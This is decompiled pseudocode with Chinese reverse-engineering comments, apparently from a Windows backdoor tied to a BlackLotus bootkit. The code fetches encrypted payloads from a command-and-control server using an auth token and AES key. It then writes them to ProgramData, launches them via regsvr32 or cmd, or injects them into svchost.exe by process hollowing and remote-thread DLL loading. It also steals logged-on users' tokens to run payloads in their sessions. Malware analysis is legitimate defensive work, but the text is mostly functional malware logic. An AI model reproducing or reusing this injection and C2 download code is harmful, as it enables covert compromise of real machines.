wchar_t *aes_key;

wchar_t *__fastcall getValue_and_Aeskey_140007090(const wchar_t *recvdata, WsValue *a2)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  aeskey = 0i64;
  v24 = 0;
  Heap = 0i64;
  memset(a2, 0, sizeof(WsValue));
  // {"Type":
  v6 = deobfuscate_wstring(word_14000B6F0, 9u, 1);
  v7 = getvalue_1400051A4(recvdata, v6);
  a2->Type = (wchar_t *)v7;
  if ( !v7 )
    goto LABEL_18;

  // "Method":
  v8 = deobfuscate_wstring(word_14000B708, 0xAu, 1);
  v9 = getvalue_1400051A4(recvdata, v8);
  a2->Method = (wchar_t *)v9;
  if ( !v9 )
    goto LABEL_18;

  // "File":"
  v10 = deobfuscate_wstring(word_14000B720, 9u, 1);
  v11 = getvalue_1400051A4(recvdata, v10);
  a2->File = (wchar_t *)v11;
  if ( !v11 )
    goto LABEL_18;

  // "FileType":"
  v12 = deobfuscate_wstring(word_14000B738, 0xDu, 1);
  v13 = getvalue_1400051A4(recvdata, v12);
  a2->FileType = (wchar_t *)v13;
  if ( !v13 )
    goto LABEL_18;

  if ( (unsigned int)wcslen((wchar_t *)v13) < 3 )
    goto LABEL_18;

  // "User":
  v14 = deobfuscate_wstring(word_14000B758, 8u, 1);
  v15 = getvalue_1400051A4(recvdata, v14);
  a2->User = (wchar_t *)v15;
  if ( !v15 )
    goto LABEL_18;

  // "auth_token":"
  v16 = deobfuscate_wstring(word_14000B770, 0xFu, 1);
  v17 = getvalue_1400051A4(recvdata, v16);
  a2->auth_token = (wchar_t *)v17;
  if ( !v17 )
    goto LABEL_18;

  // "cmd_line":"
  v18 = deobfuscate_wstring(word_14000B790, 0xDu, 1);
  v19 = getvalue_1400051A4(recvdata, v18);
  if ( !v19 )
    goto LABEL_18;

  CryptStringToBinaryW((LPCWSTR)v19, 0, 1u, 0i64, &v24, 0i64, 0i64);
  if ( v24 )
  {
    Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v24 + 10);
    if ( Heap )
    {
      // CRYPT_STRING_BASE64
      // 0x00000001
      if ( CryptStringToBinaryW((LPCWSTR)v19, 0, 1u, (BYTE *)Heap, &v24, 0i64, 0i64) )
      {
        v20 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (v24 + 10));
        a2->cmd_line_b64dec = v20;
        if ( v20 )
        {
          str2wstr_140005424(Heap, v20);
          // "aes_key":"
          v21 = deobfuscate_wstring(word_14000B7B0, 12u, 1);
          v22 = getvalue_1400051A4(recvdata, v21);
          a2->aes_key = (wchar_t *)v22;
          if ( v22 )
            aeskey = wcsstr(recvdata, v21) + 12;
        }
      }
    }
  }

  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v19);
  if ( Heap )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

  if ( !aeskey )
LABEL_18:
    free_WsValue_14000744C(a2);

  return aeskey;
}

command_type1_140006318

void __fastcall command_type1_140006318(HttpST *httpst, WsValue *wsvalue)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  Handle = 0i64;
  v4 = 0;
  Heap = (ThreadParameter *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x40ui64);
  parameter = Heap;
  if ( Heap )
  {
    p_datasz = (ULONG *)&Heap->datasz;
    Data_by_auth_token = getData_by_auth_token_140004108(httpst, wsvalue, &Heap->datasz);
    parameter->data = Data_by_auth_token;
    if ( Data_by_auth_token )
    {
      if ( *p_datasz && !(unsigned int)sys_140006980(wsvalue, parameter) )
      {
        v9 = *p_datasz;
        *(_WORD *)&parameter->Method = *wsvalue->Method;
        parameter->isX86 = isPEx86_140003C1C((__int64)parameter->data, v9);
        FileType = wsvalue->FileType;
        // FileType-->dll
        if ( *FileType != 'd' || FileType[1] != 'l' || (v11 = FileType[2] == 'l', v12 = 1, !v11) )
          v12 = 0;

        parameter->isDll = v12;
        v13 = wsvalue->FileType;
        if ( *v13 != 'e' || v13[1] != 'x' || (v11 = v13[2] == 'e', v14 = 1, !v11) )
          v14 = 0;

        parameter->isEXE = v14;
        parameter->isUser3or5 = 0;
        if ( *wsvalue->Method == '2' )          // 保存文件
        {
          //  \??\%c:\ProgramData\%s.%s
          // drivenumber wsvalue->File, wsvalue->FileType
          v15 = savefile_1400088C4(parameter->data, *p_datasz, wsvalue);
          parameter->path = v15;
          if ( !v15 )
            goto END;

          if ( !parameter->isEXE )
          {                                     // dll
            v16 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x64ui64);
            parameter->cmd_prefix = v16;
            if ( !v16 )
              goto END;

            // regsvr32 /s
            v17 = word_14000B5A0;
            if ( !parameter->isDll )            // isDll
              // cmd /c
              v17 = word_14000B5C0;

            v18 = deobfuscate_wstring((WORD *)v17, parameter->isDll != 0 ? 13 : 8, 1);
            cmd_prefix = parameter->cmd_prefix;
            v20 = '2';
            do
            {
              if ( v20 == 0xFFFFFFFF80000034ui64 )
                break;

              if ( !*v18 )
                break;

              *cmd_prefix++ = *v18++;
              --v20;
            }
            while ( v20 );

            v21 = cmd_prefix - 1;
            if ( v20 )
              v21 = cmd_prefix;

            *v21 = 0;
          }
        }
        else
        {                                       // 内存加载,不保存文件
          v22 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x208ui64);
          parameter->path = v22;
          if ( !v22 )
            goto END;

          *parameter->path = ret_disk_drivenumber_140008000();
          // :\Windows\System32\svchost.exe
          v23 = x64svchost_14000B5E0;
          if ( parameter->isX86 )               // isx86
            // :\Windows\SysWOW64\svchost.exe
            v23 = x86svchost_14000B620;

          v24 = deobfuscate_wstring((WORD *)v23, 0x1Fu, 1);
          wscat(parameter->path, 260i64, (__int64)v24);
        }

        cmd_line_b64dec = wsvalue->cmd_line_b64dec;
        if ( *cmd_line_b64dec == 32 )
        {
          v26 = wcslen(cmd_line_b64dec);
          v27 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v26 + 1));
          parameter->cmdline = v27;
          if ( !v27 )
            goto END;

          v28 = wcslen(wsvalue->cmd_line_b64dec);
          wcsncpy_0(parameter->cmdline, (const wchar_t *)(unsigned int)(v28 + 1), (size_t)wsvalue->cmd_line_b64dec);
        }

        v4 = 1;
        if ( *wsvalue->User != '2' )
        {
          if ( *wsvalue->User != '3' )
          {
            if ( *wsvalue->User != '4' )
            {
              if ( *wsvalue->User != '5' )
              {
                launch_14000691C(parameter);    // 0,1,>5
                goto END;
              }

              parameter->isUser3or5 = 1;        // 5
            }

            lpStartAddress = privilege_4_5_140006804;// 4 5
            goto LABEL_42;
          }

          parameter->isUser3or5 = 1;            // 3
        }

        lpStartAddress = AdminPrivilege_2_3_140006640;// user2 3

LABEL_42:
        NtCreateThreadEx(
          &Handle,
          0x1FFFFFu,
          0i64,
          (HANDLE)0xFFFFFFFFFFFFFFFFi64,
          lpStartAddress,
          parameter,
          0,
          0i64,
          0i64,
          0i64,
          0i64);
      }
    }
  }

END:
  if ( Handle )
    NtClose(Handle);

  if ( !v4 )
  {
    if ( parameter )
      free_140007354(parameter);
  }
}
getData_by_auth_token_140004108
PVOID __fastcall getData_by_auth_token_140004108(HttpST *httpst, WsValue *wsvalue, _DWORD *decsz)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v32 = 4;
  v37 = 0;
  auth_token = wsvalue->auth_token;
  v5 = 0i64;
  Data = 0i64;
  outsz = 0x2100000000i64;
  hRequest = 0i64;
  v30 = 0;
  if ( (unsigned int)wcslen(auth_token) < 0x32 )
  {
    // {"auth_token":"%s"}
    v9 = deobfuscate_wstring(word_14000AFA0, 0x14u, 1);
    snwprintf(Str, 0x64u, v9, wsvalue->auth_token);
    wcslen(Str);
    v10 = rsaenc_base64_140001370(Str);
    if ( v10 )
    {
      v11 = urlenc_140005498(v10, 1);
      v12 = (char *)v11;
      if ( v11 )
      {
        v13 = strlen(v11) + 20;
        Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v13);
        if ( Heap )
        {
          v15 = deobfuscate_bytes(byte_14000AFD0, 0xAu, 1);
          if ( v13 )
          {
            if ( v13 <= 0x7FFFFFFF )
            {
              v16 = v13;
              v17 = Heap;
              v18 = v15 - (BYTE *)Heap;
              do
              {
                if ( !(2147483646 - v13 + v16) )
                  break;

                v19 = v17[v18];
                if ( !v19 )
                  break;

                *v17++ = v19;
                --v16;
              }
              while ( v16 );

              v20 = v17 - 1;
              if ( v16 )
                v20 = v17;

              *v20 = 0;
            }
            else
            {
              *Heap = 0;
            }
          }

          strcat(Heap, (const char *)v13);
          v21 = httpst->DataST_20.sslflag != 0 ? 8388864 : 256;
          v22 = deobfuscate_wstring(POST_14000AFE0, 5u, 1);
          v23 = WinHttpOpenRequest(httpst->hConnect, v22, httpst->DataST_20.pwszObjectName, 0i64, 0i64, 0i64, v21);
          hRequest = v23;
          if ( v23 )
          {
            v31 = 13056;
            if ( WinHttpSetOption(v23, 0x1Fu, &v31, 4u) )
            {
              // Content-Type: application/x-www-form-urlencoded
              v24 = deobfuscate_wstring(Content_Type_14000AFF0, 0x30u, 1);
              v25 = strlen(Heap);
              v26 = strlen(Heap);
              if ( WinHttpSendRequest(hRequest, v24, 0xFFFFFFFF, Heap, v26, v25, 0i64) )
              {
                if ( WinHttpReceiveResponse(hRequest, 0i64) )
                {
                  if ( WinHttpQueryHeaders(hRequest, 0x20000013u, 0i64, &v37, &v32, 0i64) )
                  {
                    if ( v37 == 200 )
                    {
                      Data = (CHAR *)get_HttpReadData(hRequest, (unsigned int *)&outsz);
                      if ( Data )
                      {
                        v27 = outsz;
                        if ( (_DWORD)outsz )
                        {
                          if ( CryptStringToBinaryW(wsvalue->aes_key, 0, 1u, v33, (DWORD *)&outsz + 1, 0i64, 0i64) )
                          {
                            if ( HIDWORD(outsz) == 32 )
                            {
                              v5 = AESCBC256_dec_recvdata_140001060(Data, v33, v27, &v30);
                              if ( v5 )
                                *decsz = v30;
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }

        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v12);
        if ( Heap )
          RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

        if ( Data )
          RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Data);

        if ( hRequest )
          WinHttpCloseHandle(hRequest);
      }
    }
  }

  return v5;
}
sys_140006980

sys文件通过BlackLotus 内核进行加载

__int64 __fastcall sys_140006980(WsValue *wsvalue, ThreadParameter *Parameter)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  FileType = wsvalue->FileType;
  v3 = 0;
  // sys
  if ( *(_DWORD *)FileType == 0x790073 && FileType[2] == 0x73 )
  {
    v3 = 1;
    Heap = (sectiondata *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, (unsigned int)Parameter->datasz + 16i64);
    if ( Heap )
    {
      if ( (unsigned int)isTargetPEType_140003F60((__int64)Parameter->data, Parameter->datasz) )
      {
        Heap->tag[0] = 'I';
        Heap->datasz = Parameter->datasz;
        strcpyWs_14000102C(Heap->data, (wchar_t *)Parameter->data, (unsigned int)Parameter->datasz);
        evnet_section_2sys_1400082F0(Heap);
      }

      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
    }
  }

  return v3;
}
savefile_1400088C4

保存文件到ProgramData目录

_WORD *__fastcall savefile_1400088C4(void *data, ULONG sz, WsValue *wsvalue)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  FileHandle = 0i64;
  v6 = 0i64;
  // \??\%c:\ProgramData\%s.%s
  v7 = deobfuscate_wstring(word_14000B690, 0x1Au, 1);
  v8 = ret_disk_drivenumber_140008000();        // 获取盘符
  v9 = v7;
  v10 = 260i64;
  snwprintf(&v20, 0x104u, v9, v8, wsvalue->File, wsvalue->FileType);
  RtlInitUnicodeString(&v17, &v20);
  ObjectAttributes.Length = 48;
  ObjectAttributes.RootDirectory = 0i64;
  ObjectAttributes.Attributes = 64;
  ObjectAttributes.ObjectName = &v17;
  *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
  if ( NtCreateFile(&FileHandle, 0x120116u, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 2u, 0, 0x860u, 0i64, 0) >= 0
    && NtWriteFile(FileHandle, 0i64, 0i64, 0i64, &IoStatusBlock, data, sz, 0i64, 0i64) >= 0 )
  {
    Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x20Aui64);
    v6 = Heap;
    if ( Heap )
    {
      v12 = Heap;
      v13 = (char *)(v21 - (char *)Heap);
      do
      {
        if ( v10 == 0xFFFFFFFF80000106ui64 )
          break;

        v14 = *(_WORD *)((char *)v12 + (_QWORD)v13);
        if ( !v14 )
          break;

        *v12++ = v14;
        --v10;
      }
      while ( v10 );

      v15 = v12 - 1;
      if ( v10 )
        v15 = v12;

      *v15 = 0;
    }
  }

  if ( FileHandle )
    NtClose(FileHandle);

  return v6;
}
launch_14000691C
void __fastcall launch_14000691C(ThreadParameter *parameter)
{
  bool v1; // zf
  struct _PROCESS_INFORMATION lpProcessInformation; // [rsp+20h] [rbp-28h] BYREF

  // user1
  v1 = *(_WORD *)&parameter->Method == '1';     // Process Hollowing
  memset(&lpProcessInformation, 0, sizeof(lpProcessInformation));
  if ( v1 )
  {
    if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(0i64, 0i64, parameter, &lpProcessInformation) )
      load_Terminate_14000368C(parameter, &lpProcessInformation);
  }

  else if ( *(_WORD *)&parameter->Method == '2' )// run
  {
    Create_ProcessAsUserW_method2_140006E0C(0i64, 0i64, parameter);
  }

  free_140007354(parameter);
}
Create_ProcessAsUserW_method1_suspended_140006F88
__int64 __fastcall Create_ProcessAsUserW_method1_suspended_140006F88(
        HANDLE hToken,
        void *lpEnvironment,
        ThreadParameter *parameter,
        struct _PROCESS_INFORMATION *lpProcessInformation)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v7 = 0;
  memset(&lpStartupInfo, 0, sizeof(lpStartupInfo));
  v9 = lpCommandLine;
  v10 = 0x212i64;
  v11 = (char *)parameter->path - (char *)lpCommandLine;
  do
  {
    if ( v10 == 0xFFFFFFFF80000214ui64 )
      break;

    v12 = *(wchar_t *)((char *)v9 + v11);
    if ( !v12 )
      break;

    *v9++ = v12;
    --v10;
  }
  while ( v10 );

  cmdline = parameter->cmdline;
  v14 = v9 - 1;
  if ( v10 )
    v14 = v9;

  *v14 = 0;
  if ( cmdline )
    wscat(lpCommandLine, 0x212i64, (__int64)cmdline);

  if ( CreateProcessAsUserW(
         hToken,
         0i64,
         lpCommandLine,
         0i64,
         0i64,
         0,
         0x2000424u,                            // CREATE_PRESERVE_CODE_AUTHZ_LEVEL
                                                // 0x02000000
                                                // CREATE_UNICODE_ENVIRONMENT
                                                // 0x00000400
                                                // #define NORMAL_PRIORITY_CLASS             0x00000020
                                                // CREATE_SUSPENDED
                                                // 0x00000004
         lpEnvironment,
         0i64,
         &lpStartupInfo,
         lpProcessInformation) )
  {
    return 1;
  }

  return v7;
}
load_Terminate_14000368C
NTSTATUS __fastcall load_Terminate_14000368C(
        ThreadParameter *parameter,
        struct _PROCESS_INFORMATION *lpProcessInformation)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  data = (char *)parameter->data;
  if ( !(unsigned int)isTargetPEType_140003F60((__int64)data, parameter->datasz)
    || ((isDll = parameter->isDll, ntheader = (_IMAGE_NT_HEADERS *)&data[*((int *)data + 15)], parameter->isX86) ? (!isDll ? (result = x86exe_hollow_140003D1C(lpProcessInformation, data, ntheader)) : (result = x86dll_140003728(lpProcessInformation, data, ntheader))) : !isDll ? (result = x64exe_hollow_140003E38(lpProcessInformation, data, (_IMAGE_NT_HEADERS64 *)ntheader)) : (result = x64dll_140003890(lpProcessInformation, data, (_IMAGE_NT_HEADERS64 *)ntheader)),
        !result) )
  {
    result = NtTerminateProcess(lpProcessInformation->hProcess, -1);
  }

  if ( lpProcessInformation->hProcess )
    result = NtClose(lpProcessInformation->hProcess);

  hThread = lpProcessInformation->hThread;
  if ( hThread )
    return NtClose(hThread);

  return result;
}


__int64 __fastcall isTargetPEType_140003F60(__int64 a1, unsigned int sz)
{
  unsigned int v2; // ebx
  _IMAGE_NT_HEADERS64 *v3; // rdi
  __int64 v4; // rax

  v2 = 0;
  if ( sz >= 0x210 && *(_WORD *)a1 == 0x5A4D )
  {
    v3 = (_IMAGE_NT_HEADERS64 *)(a1 + *(int *)(a1 + 0x3C));
    if ( v3->Signature == 0x4550 )
    {
      if ( (unsigned int)isPEx86_140003C1C(a1, sz) )
      {                                         // x86
        v4 = (__int64)&v3->OptionalHeader.DataDirectory[12];// struct IMAGE_DATA_DIRECTORY COMRuntimedescriptor
        if ( HIDWORD(v3->OptionalHeader.SizeOfHeapReserve) <= 0xE )
          v4 = 0i64;
      }
      else                                      // x64
      {
        if ( v3->OptionalHeader.NumberOfRvaAndSizes <= 14 )
          return 1;

        v4 = (__int64)&v3->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR];// struct IMAGE_DATA_DIRECTORY COMRuntimedescriptor
      }

      if ( !v4 || !*(_DWORD *)v4 )
        return 1;                               // NOT .NET executable
    }
  }

  return v2;
}



__int64 __fastcall x86exe_hollow_140003D1C(
        struct _PROCESS_INFORMATION *lpProcessInformation,
        char *data,
        _IMAGE_NT_HEADERS *ntheader32)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v6 = 0;
  memset(&v9.Dr0, 0, 0x2C8u);
  hThread = lpProcessInformation->hThread;
  ProcessInformation = 0i64;
  v10 = 0i64;
  v9.ContextFlags = CONTEXT_FULL;
  if ( RtlWow64GetThreadContext(hThread, &v9) >= 0
    && NtQueryInformationProcess(lpProcessInformation->hProcess, ProcessWow64Information, &ProcessInformation, 8u, 0i64) >= 0 )
  {
    v10 = mapPE32_140003A00(lpProcessInformation, data, 0i64, ntheader32, 1);
    if ( v10 )
    {
      if ( NtWriteVirtualMemory(lpProcessInformation->hProcess, (PVOID)(ProcessInformation + 8), &v10, 4ui64, 0i64) >= 0 )
      {
        v9.Eax = (_DWORD)v10 + ntheader32->OptionalHeader.AddressOfEntryPoint;
        if ( RtlWow64SetThreadContext(lpProcessInformation->hThread, &v9) >= 0
          && NtResumeThread(lpProcessInformation->hThread, 0i64) >= 0 )
        {
          return 1;
        }
      }
    }
  }

  return v6;
}


__int64 __fastcall x86dll_140003728(
        struct _PROCESS_INFORMATION *lpProcessInformation,
        char *pedata,
        _IMAGE_NT_HEADERS *ntheader32)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  RegionSize = 4096i64;
  Handle = 0i64;
  BaseAddress = 0i64;
  memset(&dll32st, 0, sizeof(dll32st));
  v4 = (_IMAGE_NT_HEADERS *)&loaddll_stubpe_data[dword_14000D04C];
  v7 = 0;
  v8 = mapPE32_140003A00(lpProcessInformation, pedata, 0i64, ntheader32, 0);
  if ( v8 )
  {
    dll32st.targetpe_ntheader = (_DWORD)v8 + *((_DWORD *)pedata + 15);
    VirtualAddress = ntheader32->OptionalHeader.DataDirectory[1].VirtualAddress;// 导入表
    dll32st.targetpe_addr = (int)v8;
    dll32st.targetpe_importaddr = (_DWORD)v8 + VirtualAddress;
    v10 = mapPE32_140003A00(lpProcessInformation, loaddll_stubpe_data, 0i64, v4, 0);
    if ( v10 )
    {
      if ( NtAllocateVirtualMemory(lpProcessInformation->hProcess, &BaseAddress, 0i64, &RegionSize, 0x3000u, 4u) >= 0
        && (unsigned __int64)BaseAddress <= 0xFFFFFFFF
        // int __stdcall start(DLL32ST *a1)
        // {
        //   // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

        //   targetpe_importaddr = (_IMAGE_IMPORT_DESCRIPTOR *)a1->targetpe_importaddr;
        //   if ( targetpe_importaddr )
        //   {
        //     // KERNEL32.DLL
        //     dllbase = get_dllbase(0x536CD652);          // KERNEL32.DLL BaseNameHashValue : 0x536cd652
        //     if ( !dllbase )
        //       dllbase = get_dllbase(0x8F7EE672);        // kernel32.dll-->0x8f7ee672

        //     a1->GetProcAddress = get_proc_address_by_hash((int)dllbase, 0x80E96588);// GetProcAddress
        //     a1->LoadLibraryA = get_proc_address_by_hash((int)dllbase, 0xDF2BBBEC);// LoadLibraryA
        //     while ( targetpe_importaddr->DUMMYUNIONNAME.Characteristics )
        //     {
        //       OriginalFirstThunk = (_IMAGE_THUNK_DATA32 *)(a1->targetpe_addr
        //                                                  + targetpe_importaddr->DUMMYUNIONNAME.Characteristics);
        //       v11 = (_IMAGE_THUNK_DATA32 *)(a1->targetpe_addr + targetpe_importaddr->FirstThunk);
        //       v10 = ((int (__stdcall *)(DWORD))a1->LoadLibraryA)(a1->targetpe_addr + targetpe_importaddr->Name);
        //       if ( !v10 )
        //         return 1;

        //       Characteristics = OriginalFirstThunk->u1.ForwarderString;
        //       if ( OriginalFirstThunk->u1.ForwarderString )
        //       {
        //         v12 = (DLL32ST *)((char *)v11 - (char *)OriginalFirstThunk);
        //         do
        //         {
        //           v6 = Characteristics >= 0 ? Characteristics + a1->targetpe_addr + 2 : (unsigned __int16)Characteristics;
        //           v7 = ((int (__stdcall *)(int, int))a1->GetProcAddress)(v10, v6);
        //           if ( !v7 )
        //             return 1;

        //           *(DWORD *)((char *)&OriginalFirstThunk->u1.ForwarderString + (_DWORD)v12) = v7;
        //           ++OriginalFirstThunk;
        //           Characteristics = OriginalFirstThunk->u1.ForwarderString;
        //         }
        //         while ( OriginalFirstThunk->u1.ForwarderString );
        //       }

        //       ++targetpe_importaddr;
        //     }
        //   }

        //   dllmain = a1->targetpe_ntheader->OptionalHeader.AddressOfEntryPoint;
        //   if ( dllmain )
        //     // BOOL WINAPI DllMain(
        //     //     HINSTANCE hinstDLL,  // handle to DLL module
        //     //     DWORD fdwReason,     // reason for calling function
        //     //     LPVOID lpvReserved )  // reserved
        //     ((void (__stdcall *)(int, int, _DWORD))(dllmain + a1->targetpe_addr))(a1->targetpe_addr, 1, 0);

        //   return 1;
        // }
        && NtWriteVirtualMemory(lpProcessInformation->hProcess, BaseAddress, &dll32st, 0x14ui64, 0i64) >= 0
        && NtCreateThreadEx(
             &Handle,
             0x1FFFFFu,
             0i64,
             lpProcessInformation->hProcess,
             &v10[v4->OptionalHeader.AddressOfEntryPoint],
             BaseAddress,
             0,
             0i64,
             0i64,
             0i64,
             0i64) >= 0 )
      {
        v7 = 1;
      }
    }
  }

  if ( Handle )
    NtClose(Handle);

  return v7;
}


__int64 __fastcall x64exe_hollow_140003E38(
        struct _PROCESS_INFORMATION *lpProcessInformation,
        char *data,
        _IMAGE_NT_HEADERS64 *ntheader64)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v6 = 0;
  memset(&v11, 0, sizeof(v11));
  hThread = lpProcessInformation->hThread;
  v11.ContextFlags = CONTEXT_FULL;
  memset(ProcessInformation_8, 0, sizeof(ProcessInformation_8));
  if ( NtGetContextThread(hThread, &v11) >= 0
    && NtQueryInformationProcess(
         lpProcessInformation->hProcess,
         ProcessBasicInformation,
         ProcessInformation_8,
         0x30u,
         0i64) >= 0 )
  {
    v12 = mapPE64_140003B14(lpProcessInformation, data, 0i64, ntheader64, 1);
    if ( v12 )
    {
      if ( NtWriteVirtualMemory(
             lpProcessInformation->hProcess,
             (PVOID)(ProcessInformation_8[1] + 16i64),
             &v12,
             8ui64,
             0i64) >= 0 )
      {
        v8 = lpProcessInformation->hThread;
        v11.Rcx = (DWORD64)&v12[ntheader64->OptionalHeader.AddressOfEntryPoint];
        if ( NtSetContextThread(v8, &v11) >= 0 && NtResumeThread(lpProcessInformation->hThread, 0i64) >= 0 )
          return 1;
      }
    }
  }

  return v6;
}


__int64 __fastcall x64dll_140003890(
        struct _PROCESS_INFORMATION *lpProcessInformation,
        char *data,
        _IMAGE_NT_HEADERS64 *ntheader64)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  RegionSize = 4096i64;
  Handle = 0i64;
  BaseAddress = 0i64;
  memset(&Buffer, 0, sizeof(Buffer));
  v6 = 0;
  v7 = mapPE64_140003B14(lpProcessInformation, data, 0i64, ntheader64, 0);
  if ( v7 )
  {
    Buffer.targetpe_addr = v7;
    Buffer.targetpe_ntheader64 = (_IMAGE_NT_HEADERS64 *)&v7[*((int *)data + 15)];
    hProcess = lpProcessInformation->hProcess;
    Buffer.targetpe_importaddr = (_IMAGE_IMPORT_DESCRIPTOR *)&v7[ntheader64->OptionalHeader.DataDirectory[1].VirtualAddress];
    Buffer.LoadLibraryA = LoadLibraryA;
    Buffer.GetProcAddress = GetProcAddress;
    if ( NtAllocateVirtualMemory(hProcess, &BaseAddress, 0i64, &RegionSize, 0x3000u, 0x40u) >= 0
      && NtWriteVirtualMemory(lpProcessInformation->hProcess, BaseAddress, &Buffer, 0x28ui64, 0i64) >= 0
      && NtWriteVirtualMemory(
           lpProcessInformation->hProcess,
           (char *)BaseAddress + 0x28,
           dllload_stub_140003C54,
           0xC6ui64,
           0i64) >= 0
      && NtCreateThreadEx(
           &Handle,
           0x1FFFFFu,
           0i64,
           lpProcessInformation->hProcess,
           (char *)BaseAddress + 40,
           BaseAddress,
           0,
           0i64,
           0i64,
           0i64,
           0i64) >= 0 )
    {
      v6 = 1;
    }
  }

  if ( Handle )
    NtClose(Handle);

  return v6;
}
Create_ProcessAsUserW_method2_140006E0C
__int64 __fastcall Create_ProcessAsUserW_method2_140006E0C(
        HANDLE hToken,
        void *lpEnvironment,
        ThreadParameter *parameter)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  memset(&lpProcessInformation, 0, sizeof(lpProcessInformation));
  memset(&lpStartupInfo, 0, sizeof(lpStartupInfo));
  v6 = lpCommandLine;
  v7 = 0x212i64;
  if ( parameter->isEXE )
  {
    v8 = (char *)parameter->path - (char *)lpCommandLine;
    do
    {
      if ( v7 == 0xFFFFFFFF80000214ui64 )
        break;

      v9 = *(wchar_t *)((char *)v6 + v8);
      if ( !v9 )
        break;

      *v6++ = v9;
      --v7;
    }
    while ( v7 );

    v10 = v6 - 1;
    if ( v7 )
      v10 = v6;

    *v10 = 0;
  }
  else
  {
    v11 = (char *)parameter->cmd_prefix - (char *)lpCommandLine;
    do
    {
      if ( v7 == -2147483116 )
        break;

      v12 = *(wchar_t *)((char *)v6 + v11);
      if ( !v12 )
        break;

      *v6++ = v12;
      --v7;
    }
    while ( v7 );

    path = parameter->path;
    v14 = v6 - 1;
    if ( v7 )
      v14 = v6;

    *v14 = 0;
    wscat(lpCommandLine, 0x212i64, (__int64)path);
  }

  cmdline = parameter->cmdline;
  if ( cmdline && !parameter->isDll )
    wscat(lpCommandLine, 0x212i64, (__int64)cmdline);

  v16 = CreateProcessAsUserW(
          hToken,
          0i64,
          lpCommandLine,
          0i64,
          0i64,
          0,
          0xA000420u,                           // CREATE_NO_WINDOW
                                                // 0x08000000
                                                // CREATE_PRESERVE_CODE_AUTHZ_LEVEL
                                                // 0x02000000
                                                // CREATE_UNICODE_ENVIRONMENT
                                                // 0x00000400
                                                // #define NORMAL_PRIORITY_CLASS             0x00000020
          lpEnvironment,
          0i64,
          &lpStartupInfo,
          &lpProcessInformation);
  if ( v16 )
  {
    NtClose(lpProcessInformation.hProcess);
    NtClose(lpProcessInformation.hThread);
  }

  return v16;
}
privilege_4_5_140006804
__int64 __fastcall privilege_4_5_140006804(ThreadParameter *parameter)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  Handle = 0i64;
  v9 = 0i64;
  memset(&ProcessInformation, 0, sizeof(ProcessInformation));
  while ( 1 )
  {
    do
    {
      Sleep(1000u);
      SessionId = getSessionId_140007648();
    }
    while ( !SessionId );

    if ( !WTSQueryUserToken(SessionId, &Handle) )
      break;

    if ( (unsigned int)isAdmin_14000879C(Handle) || !parameter->isUser3or5 )// admin或者2,4
    {
      if ( CreateEnvironmentBlock(&v9, Handle, 1) )
      {
        LinkedToken = getLinkedToken_1400076B4(Handle);
        if ( *(_WORD *)&parameter->Method == '1' )
        {
          hToken = Handle;
          if ( LinkedToken )
            hToken = LinkedToken;

          if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(
                               hToken,
                               v9,
                               parameter,
                               &ProcessInformation) )
            load_Terminate_14000368C(parameter, &ProcessInformation);
        }

        else if ( *(_WORD *)&parameter->Method == '2' )
        {
          v4 = Handle;
          if ( LinkedToken )
            v4 = LinkedToken;

          Create_ProcessAsUserW_method2_140006E0C(v4, v9, parameter);
        }
      }

      break;
    }

    NtClose(Handle);
    Handle = 0i64;
  }

  if ( v9 )
    DestroyEnvironmentBlock(v9);

  if ( Handle )
    NtClose(Handle);

  if ( parameter )
    free_140007354(parameter);

  return 0i64;
}

__int64 getSessionId_140007648()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

